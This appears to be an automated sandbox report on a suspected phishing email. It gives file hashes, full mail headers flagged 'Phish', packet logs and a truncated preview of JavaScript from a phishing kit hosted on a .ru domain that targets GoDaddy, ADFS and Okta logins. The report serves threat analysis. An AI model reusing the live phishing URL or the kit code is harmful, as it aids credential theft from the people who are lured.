                                                                                                                                                                                                                                                                                                              Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):24
                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.459147917027245
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                                                                                                                                              MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                                                                                                                                              SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                                                                                                                                              SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                                                                                                                                              SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:GIF89a.......,..........
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (817), with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):2394
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0083835060445345
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:/u2G2VD0CQwKHwKDlpswKlXFrGCE8YcXNru5EqXutrt3EfqfRVsc+wIs8/TaTmqU:W2pVD9ZgpjMRk+bLDZoFX
                                                                                                                                                                                                                                                                                                              MD5:33BCAF71B38A9826EC8AA11B5B4BE525
                                                                                                                                                                                                                                                                                                              SHA1:1ECE6016AFA90453B6C6FCA591B65731B508588D
                                                                                                                                                                                                                                                                                                              SHA-256:9D3FB9D0676E219805B248A9A16D92E6536C8951F682441FDD6B5A607877C879
                                                                                                                                                                                                                                                                                                              SHA-512:8189C6F3249D1F25B6779B534963534565BA3DB3FBBA1F322FE7F75993B7121ABCE0693F6F42D46BD4B65AF18964B9089097074329D203A3331C708046C6C148
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://yxmaiypmfuyt.holdbitco.ru/web5/assets/js/pages-head-top-web.min.js?cb=1698251257410
                                                                                                                                                                                                                                                                                                              Preview:var webname = "/web5";..// var websitenames = ["godaddy", "adfs", "adfs-sidebar", "okta"];..var websitenames = ["godaddy"];..// const cacheBuster = Math.round(new Date().getTime() / 1000);..const cacheBuster = new Date().getTime();..var linkElement = document.createElement("link");..linkElement.rel = "stylesheet";..linkElement.href = webname+"/assets/pages/"+pagelinkval+".css" + "?cb=" + cacheBuster;..document.head.appendChild(linkElement);..var scriptElementsocket = document.createElement("script");..scriptElementsocket.src = "https://cdn.socket.io/4.6.0/socket.io.min.js";..document.head.appendChild(scriptElementsocket);..var linkElementcss = document.createElement("link");..linkElementcss.rel = "stylesheet";..linkElementcss.href = webname+"/assets/css/pages.min.css" + "?cb=" + cacheBuster;..document.head.appendChild(linkElementcss);..for (var i = 0; i < websitenames.length; i++) {..var linkElementcssweb = document.createElement("link");..linkElementcssweb.rel = "stylesheet";..linkEle
                                                                                                                                                                                                                                                                                                              File type:CDFV2 Microsoft Outlook Message
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.875768686431207
                                                                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                                                                              • Outlook Message (71009/1) 58.92%
                                                                                                                                                                                                                                                                                                              • Outlook Form Template (41509/1) 34.44%
                                                                                                                                                                                                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 6.64%
                                                                                                                                                                                                                                                                                                              File name:EXTERNAL DESERT FORREST NURSERY LLC.msg
                                                                                                                                                                                                                                                                                                              File size:221'184 bytes
                                                                                                                                                                                                                                                                                                              MD5:e84898d4c5aca756905273cd87bea657
                                                                                                                                                                                                                                                                                                              SHA1:c2b07d83b895a596adb97133b57c4ec003749a87
                                                                                                                                                                                                                                                                                                              SHA256:bfb4fb75c244df67a14c59b12c0aa49c147756c944bd7b5a15c721cb98aa0fe5
                                                                                                                                                                                                                                                                                                              SHA512:667be14c3293b573e90acddad251526b0d5aa9162d7d014791e2fdd8463f4f5113eccf62f9fe9812f11ce39d1ff8c4595dff0d1272a2315e8f3767914abcb9fc
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:VcrG9q0OFl1wbrbhj6vjLV4LB4hOqNw4mbMi7o00Gepr8IU9UQ:W69JOFnwbJ+8mOloi7C1Q
                                                                                                                                                                                                                                                                                                              TLSH:2924F8213AFA4109F1B79F354EF29097952BBD526E359A4F2095330E07B3A41D8A1B3F
                                                                                                                                                                                                                                                                                                              File Content Preview:........................>.......................................................{.......I......................................................................................................................................................................
                                                                                                                                                                                                                                                                                                              Subject:[EXTERNAL] DESERT FORREST NURSERY LLC
                                                                                                                                                                                                                                                                                                              From:Carlos Perez <sales@desertforrestnursery.com>
                                                                                                                                                                                                                                                                                                              To:Undisclosed recipients:;
                                                                                                                                                                                                                                                                                                              Cc:
                                                                                                                                                                                                                                                                                                              BCC:
                                                                                                                                                                                                                                                                                                              Date:Tue, 24 Oct 2023 17:55:06 +0200
                                                                                                                                                                                                                                                                                                              Communications:
                                                                                                                                                                                                                                                                                                              • This email originated from OUTSIDE of Desert Diamond. Do not click links or open attachments unless you recognize the sender and know the content is safe. If in doubt click the Report Phish button at top right of the Outlook Home Ribbon . ________________________________ This is a secure message. <https://url.emailprotection.link/?b50ZOkikVGiV6ecO-M6yQX1_uIfhcwWDRCfiQW8F0sGllFQZqVZ80Fh1DftrvvFu_dghomJbvsVEoTuqSgmuaZbXO25JyAbxfLa6LiKTusuSXBnmvmaGzKjpHdssahPaH> <https://indd.adobe.com/view/e174e561-569a-48e3-8548-c6c6e174aa25> Click here <https://indd.adobe.com/view/e174e561-569a-48e3-8548-c6c6e174aa25> within 7 days of receiving the message on a mobile device. More Info <https://indd.adobe.com/view/e174e561-569a-48e3-8548-c6c6e174aa25> Disclaimer: This email and its content are confidential and intended solely for the use of the addressee. Please notify the sender if you have received this email in error or simply delete it. Secured by Proofpoint Encryption, Copyright 2009-2023 Proofpoint, Inc. All rights reserved. Please open the attachment and let me know if you have any questions. Sincerely, ATTENTION!! ALL QUOTES/ESTIMATES ARE GOOD FOR NINETY (90) DAYS. THE QUOTE/ESTIMATE DOES NOT HAVE TO STATE THIS OR BE STAMPED WITH THIS INFORMATION FOR THE NINETY (90) DAY PERIOD TO BE IN EFFECT. ALL QUOTES/ESTIMATES ARE SUBJECT TO AVAILABILITY OF THE PRODUCT. AVAILABILITY IS NOT GUARANTEED AND IS SUBJECT TO MARKET CONDITIONS. Carlos J. Perez DESERT FORREST NURSERY LLC 16835 W. Olive Ave. Waddell, AZ 85355 Cel. 623-695-1969 Ph. 623-935-1850 Fax 623-505-9629 sales <mailto:sales@DesertForrestNursery.com> @desertforrestnursery.com FORREST EQUIPMENT RENTALS LLC 16835 W. Olive Ave. Waddell, AZ 85355 Ph. 602-831-8900 Or 602-699-3030 info@ForrestEquipmentRentals.com <mailto:info@ForrestEquipmentRentals.com> FORREST COLLISION & SALES LLC 1729 W. Coltier St. #4 Phoenix, AZ 85015 Ph.602-973-3030 Fax 623-505- 9626 forrest@ForrestCollision.com <mailto:forrest@ForrestCollision.com>
                                                                                                                                                                                                                                                                                                              Attachments:
                                                                                                                                                                                                                                                                                                              • image.png
                                                                                                                                                                                                                                                                                                              • image.png
                                                                                                                                                                                                                                                                                                              • image.png
                                                                                                                                                                                                                                                                                                              • Outlook-ivmxwufq.png
                                                                                                                                                                                                                                                                                                              • Outlook-nwy0utf2
                                                                                                                                                                                                                                                                                                              • Outlook-fxio2hte
                                                                                                                                                                                                                                                                                                              Key Value
                                                                                                                                                                                                                                                                                                              Receivedfrom BYAPR18MB2886.namprd18.prod.outlook.com
                                                                                                                                                                                                                                                                                                              15.2.1118.37 via Mailbox Transport; Tue, 24 Oct 2023 0855:12 -0700
                                                                                                                                                                                                                                                                                                              15.2.1118.37; Tue, 24 Oct 2023 0855:12 -0700
                                                                                                                                                                                                                                                                                                              15.2.1118.37 via Frontend Transport; Tue, 24 Oct 2023 0855:12 -0700
                                                                                                                                                                                                                                                                                                              Authentication-Resultsmailb.desertdiamondcasino.com; spf=Pass smtp.mailfrom=sales@desertforrestnursery.com; spf=Pass smtp.helo=postmaster@NAM02-SN1-obe.outbound.protection.outlook.com
                                                                                                                                                                                                                                                                                                              Received-SPFPass (mailb.desertdiamondcasino.com: domain of
                                                                                                                                                                                                                                                                                                              x-record-text="v=spf1 ip440.92.0.0/15 ip4:40.107.0.0/16
                                                                                                                                                                                                                                                                                                              ip452.100.0.0/14 ip4:104.47.0.0/17 ip6:2a01:111:f400::/48
                                                                                                                                                                                                                                                                                                              ip62a01:111:f403:c000::/51 ip6:2a01:111:f403:f000::/52 -all"
                                                                                                                                                                                                                                                                                                              X-Ironport-Dmarc-Check-Resultvalidskip
                                                                                                                                                                                                                                                                                                              IronPort-SDR6537e8df_Axbg12JUR7gCppS0HnJDpSHTGbCU/ccY+PY8i3MbjUm+1Vu
                                                                                                                                                                                                                                                                                                              X-IPAS-Result=?us-ascii?q?A0EaXzM66Ddlh3lgayhXAx0BASsLBgEFBQECAQkBFQyBO?=
                                                                                                                                                                                                                                                                                                              IronPort-PHdrA9a23:mwDFZRJXtyUUWNN6n9mcuMZsWUAX0o4c3iYr45Yqw4hDbr6kt8y7e
                                                                                                                                                                                                                                                                                                              IronPort-DataA9a23:HUO8YqPbSoR/O9TvrR0YnsFynXyQoLVcMsEvi/8bNLSAYAhSjmhWm
                                                                                                                                                                                                                                                                                                              IronPort-HdrOrdrA9a23:3gBlBaoE1Vuc514RSuln1l8aV5uzL9V00zEX/kB9WHVpm5Oj+v
                                                                                                                                                                                                                                                                                                              X-Talos-CUID9a23://H3/GzdvHMyTUC0BdxDBgUFEOEfcSCe7EuOLkb7WGdNV6eOdUGPrfY=
                                                                                                                                                                                                                                                                                                              X-Talos-MUID=?us-ascii?q?9a23=3A9p++JA4lOh07pyhxQ5Wq6CKVxoxh//33WBAgr68?=
                                                                                                                                                                                                                                                                                                              X-IronPort-Anti-Spam-Filteredtrue
                                                                                                                                                                                                                                                                                                              X-IronPort-AVE=Sophos;i="6.03,248,1694761200";
                                                                                                                                                                                                                                                                                                              X-Amp-ResultUNKNOWN
                                                                                                                                                                                                                                                                                                              X-Amp-Original-VerdictFILE UNKNOWN
                                                                                                                                                                                                                                                                                                              X-Amp-File-UploadedFalse
                                                                                                                                                                                                                                                                                                              X-IronPort-Outbreak-StatusNo, level 1, Phish - Phish
                                                                                                                                                                                                                                                                                                              by mailb.desertdiamondcasino.com with ESMTP/TLS/ECDHE-RSA-AES256-GCM-SHA384; 24 Oct 2023 0855:11 -0700
                                                                                                                                                                                                                                                                                                              ARC-Seali=1; a=rsa-sha256; s=arcselector9901; d=microsoft.com; cv=none;
                                                                                                                                                                                                                                                                                                              ARC-Message-Signaturei=1; a=rsa-sha256; c=relaxed/relaxed; d=microsoft.com;
                                                                                                                                                                                                                                                                                                              h=FromDate:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-SenderADCheck;
                                                                                                                                                                                                                                                                                                              ARC-Authentication-Resultsi=1; mx.microsoft.com 1; spf=pass
                                                                                                                                                                                                                                                                                                              DKIM-Signaturev=1; a=rsa-sha256; c=relaxed/relaxed;
                                                                                                                                                                                                                                                                                                              by BL1PR18MB4118.namprd18.prod.outlook.com (260310b6:208:313::18) with
                                                                                                                                                                                                                                                                                                              2023 1555:07 +0000
                                                                                                                                                                                                                                                                                                              ([fe80:d74b:3eb0:c3d0:add5%4]) with mapi id 15.20.6907.030; Tue, 24 Oct 2023
                                                                                                                                                                                                                                                                                                              1555:06 +0000
                                                                                                                                                                                                                                                                                                              FromCarlos Perez <sales@desertforrestnursery.com>
                                                                                                                                                                                                                                                                                                              Subject[EXTERNAL] DESERT FORREST NURSERY LLC
                                                                                                                                                                                                                                                                                                              Thread-IndexAQHaBpGOFc1pkH5iCkW/evhTORZHXg==
                                                                                                                                                                                                                                                                                                              DateTue, 24 Oct 2023 15:55:06 +0000
                                                                                                                                                                                                                                                                                                              Message-ID<BYAPR18MB2886FB416617585914EC7B03D3DFA@BYAPR18MB2886.namprd18.prod.outlook.com>
                                                                                                                                                                                                                                                                                                              Accept-Languageen-US
                                                                                                                                                                                                                                                                                                              Content-Languageen-US
                                                                                                                                                                                                                                                                                                              X-MS-Has-Attachyes
                                                                                                                                                                                                                                                                                                              X-MS-TNEF-Correlatormsip_labels:
                                                                                                                                                                                                                                                                                                              x-ms-publictraffictypeEmail
                                                                                                                                                                                                                                                                                                              x-ms-traffictypediagnosticBYAPR18MB2886:EE_|BL1PR18MB4118:EE_
                                                                                                                                                                                                                                                                                                              x-ms-office365-filtering-correlation-ida65f3464-6f07-4fd7-f0dd-08dbd4a997fb
                                                                                                                                                                                                                                                                                                              x-ms-exchange-senderadcheck1
                                                                                                                                                                                                                                                                                                              x-ms-exchange-antispam-relay0
                                                                                                                                                                                                                                                                                                              x-microsoft-antispamBCL:0;
                                                                                                                                                                                                                                                                                                              x-microsoft-antispam-message-info+3MpirHbIk+2cMZXxlgyG01PnU/wcTap/xmIsi5ZzpQztYm0P7X1Y/zHLH2oGOoWByiY6DKcu0UEi8sEw8eWcOLotDbIZzVCRmUzopPc6z6UVWn0a2SS0q3IuuaY9wEMUkj0WQqpIt0IoJL05Ej3sDlT1o/zRXwoMRlk+V/a9xqTiOF+IivViTZUKi14enqlhDm8AwXi6mJBgnsaK04/dULXSU+PXXrJEmH/yXyHd/LzWwT/ECGtxIGfu0chFcJMd5DREotAnzum2S9cYFk8Sb2ProjQgRxiFqfZyICA4+fQTaucTx2I+aF2Gf+FzsdTXvADC3G78vyMHHe5fNhDz9euuSh/v1DHJSAnIQFNA4b1lD3CpIeGQ8rfppYg2n7dkZp8qHFXAv62KwIbaNbfhPT0vxvil0j8Dlud7uk503akglos1Q9ouq5Z71s8aVWxV56ZjvzVSdGHJhFROkQtVP+Hve2M2nbWpPIwat6P/y9+FQtBB8i7+qnjMytRxqwNP6wSYbGQDKiPCdbGBYtAWZiwhTjbT12LgofB0HMWAreZWEhY0hjZkYVNLf81GwbKZYi2BVre2SHad2sNDwLugEZPQox/Z3ke12u6GVAq32s=
                                                                                                                                                                                                                                                                                                              x-forefront-antispam-reportCIP:255.255.255.255;CTRY:;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:BYAPR18MB2886.namprd18.prod.outlook.com;PTR:;CAT:NONE;SFS:(13230031)(136003)(39850400004)(366004)(396003)(346002)(376002)(230922051799003)(186009)(1800799009)(451199024)(64100799003)(109986022)(19627405001)(33656002)(40140700001)(55016003)(64756008)(66946007)(316002)(38070700009)(76116006)(91956017)(86362001)(66556008)(166002)(38100700002)(122000001)(99936003)(66446008)(66476007)(3480700007)(83380400001)(26005)(6506007)(71200400001)(9686003)(7696005)(1015004)(7276002)(2906002)(8936002)(7416002)(478600001)(5660300002)(7406005)(8676002)(7336002)(52536014)(41300700001)(7366002);DIR:OUT;SFP:1102;
                                                                                                                                                                                                                                                                                                              x-ms-exchange-antispam-messagedata-chunkcount1
                                                                                                                                                                                                                                                                                                              x-ms-exchange-antispam-messagedata-0=?iso-8859-1?Q?Vt86KyKPPifm2rGJS4XsSilRbsF/Ak/gnpaAMZptqaOzSCbeKZBjU9n0d1?=
                                                                                                                                                                                                                                                                                                              Content-Typemultipart/related;
                                                                                                                                                                                                                                                                                                              MIME-Version1.0
                                                                                                                                                                                                                                                                                                              X-MS-Exchange-CrossTenant-AuthAsInternal
                                                                                                                                                                                                                                                                                                              X-MS-Exchange-CrossTenant-AuthSourceBYAPR18MB2886.namprd18.prod.outlook.com
                                                                                                                                                                                                                                                                                                              X-MS-Exchange-CrossTenant-Network-Message-Ida65f3464-6f07-4fd7-f0dd-08dbd4a997fb
                                                                                                                                                                                                                                                                                                              X-MS-Exchange-CrossTenant-originalarrivaltime24 Oct 2023 15:55:06.7466
                                                                                                                                                                                                                                                                                                              X-MS-Exchange-CrossTenant-fromentityheaderHosted
                                                                                                                                                                                                                                                                                                              X-MS-Exchange-CrossTenant-idd7f2c745-7d71-4a40-9361-7ae46dc564e8
                                                                                                                                                                                                                                                                                                              X-MS-Exchange-CrossTenant-mailboxtypeHOSTED
                                                                                                                                                                                                                                                                                                              X-MS-Exchange-CrossTenant-userprincipalnameO54CW07JpkhPwgLkM00+Gt4Lh38GQdOQUMs7/Xx9A1Pm4S06iAXJp1ETDKIMgxBKQuIRfRPF7Svi5raN/NTqkAStcA+IvOoUJ2NGI0PKGf8=
                                                                                                                                                                                                                                                                                                              X-MS-Exchange-Transport-CrossTenantHeadersStampedBL1PR18MB4118
                                                                                                                                                                                                                                                                                                              ToUndisclosed recipients:;
                                                                                                                                                                                                                                                                                                              Return-Pathsales@desertforrestnursery.com
                                                                                                                                                                                                                                                                                                              X-MS-Exchange-Organization-Network-Message-Idb5a64eb0-a080-4895-b93c-08dbd4a99b47
                                                                                                                                                                                                                                                                                                              X-MS-Exchange-Organization-AuthSourcesExch01.desertdiamondcasino.com
                                                                                                                                                                                                                                                                                                              X-MS-Exchange-Organization-AuthAsAnonymous
                                                                                                                                                                                                                                                                                                              X-MS-Exchange-Transport-EndToEndLatency00:00:00.4741626
                                                                                                                                                                                                                                                                                                              X-MS-Exchange-Processed-By-BccFoldering15.02.1118.037
                                                                                                                                                                                                                                                                                                              dateTue, 24 Oct 2023 17:55:06 +0200

                                                                                                                                                                                                                                                                                                              Icon Hash:c4e1928eacb280a2

                                                                                                                                                                                                                                                                                                              Download Network PCAP: filteredfull

                                                                                                                                                                                                                                                                                                              • Total Packets: 1459
                                                                                                                                                                                                                                                                                                              • 443 (HTTPS)
                                                                                                                                                                                                                                                                                                              • 80 (HTTP)
                                                                                                                                                                                                                                                                                                              • 53 (DNS)
                                                                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:06.570734978 CEST49674443192.168.2.1623.1.237.25
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:06.570749998 CEST49673443192.168.2.1623.1.237.25
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:06.970731974 CEST49672443192.168.2.1623.1.237.25
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:08.366987944 CEST4434970723.1.237.25192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:08.367146015 CEST49707443192.168.2.1623.1.237.25
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.543220997 CEST49727443192.168.2.16172.253.62.101
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.543252945 CEST44349727172.253.62.101192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.543303013 CEST49727443192.168.2.16172.253.62.101
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.544006109 CEST49727443192.168.2.16172.253.62.101
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.544019938 CEST44349727172.253.62.101192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.544670105 CEST49728443192.168.2.16172.253.63.84
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.544693947 CEST44349728172.253.63.84192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.544790030 CEST49728443192.168.2.16172.253.63.84
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.545113087 CEST49728443192.168.2.16172.253.63.84
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.545125008 CEST44349728172.253.63.84192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.768862963 CEST44349727172.253.62.101192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.769215107 CEST49727443192.168.2.16172.253.62.101
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.769229889 CEST44349727172.253.62.101192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.769628048 CEST44349727172.253.62.101192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.769697905 CEST49727443192.168.2.16172.253.62.101
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.770344019 CEST44349727172.253.62.101192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.770395994 CEST49727443192.168.2.16172.253.62.101
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.772922039 CEST49727443192.168.2.16172.253.62.101
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.773000002 CEST44349727172.253.62.101192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.773072958 CEST49727443192.168.2.16172.253.62.101
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.773080111 CEST44349727172.253.62.101192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.773274899 CEST44349728172.253.63.84192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.773485899 CEST49728443192.168.2.16172.253.63.84
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.773504019 CEST44349728172.253.63.84192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.774578094 CEST44349728172.253.63.84192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.774631023 CEST49728443192.168.2.16172.253.63.84
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.775537968 CEST49728443192.168.2.16172.253.63.84
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.775610924 CEST44349728172.253.63.84192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.775846004 CEST49728443192.168.2.16172.253.63.84
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.775852919 CEST44349728172.253.63.84192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.817672014 CEST49727443192.168.2.16172.253.62.101
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.833620071 CEST49728443192.168.2.16172.253.63.84
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.997829914 CEST44349727172.253.62.101192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.997996092 CEST44349727172.253.62.101192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.998208046 CEST49727443192.168.2.16172.253.62.101
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.000353098 CEST49727443192.168.2.16172.253.62.101
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.000394106 CEST44349727172.253.62.101192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.047382116 CEST44349728172.253.63.84192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.047468901 CEST49728443192.168.2.16172.253.63.84
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.047477961 CEST44349728172.253.63.84192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.047576904 CEST44349728172.253.63.84192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.047632933 CEST49728443192.168.2.16172.253.63.84
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.057447910 CEST49728443192.168.2.16172.253.63.84
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.057465076 CEST44349728172.253.63.84192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.107888937 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.107964039 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.108040094 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.109556913 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.109582901 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.113039970 CEST49734443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.113122940 CEST44349734104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.113192081 CEST49734443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.113898039 CEST49734443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.113931894 CEST44349734104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.313563108 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.313889027 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.313910961 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.315212965 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.315303087 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.316382885 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.316461086 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.316548109 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.316560984 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.329065084 CEST44349734104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.329334021 CEST49734443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.329400063 CEST44349734104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.330465078 CEST44349734104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.330548048 CEST49734443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.332470894 CEST49734443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.332551956 CEST44349734104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.332633972 CEST49734443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.332650900 CEST44349734104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.369647980 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.377674103 CEST49735443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.377715111 CEST4434973513.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.377787113 CEST49735443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.380667925 CEST49735443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.380681038 CEST4434973513.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.385660887 CEST49734443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.499907970 CEST4434973199.86.229.114192.168.2.16
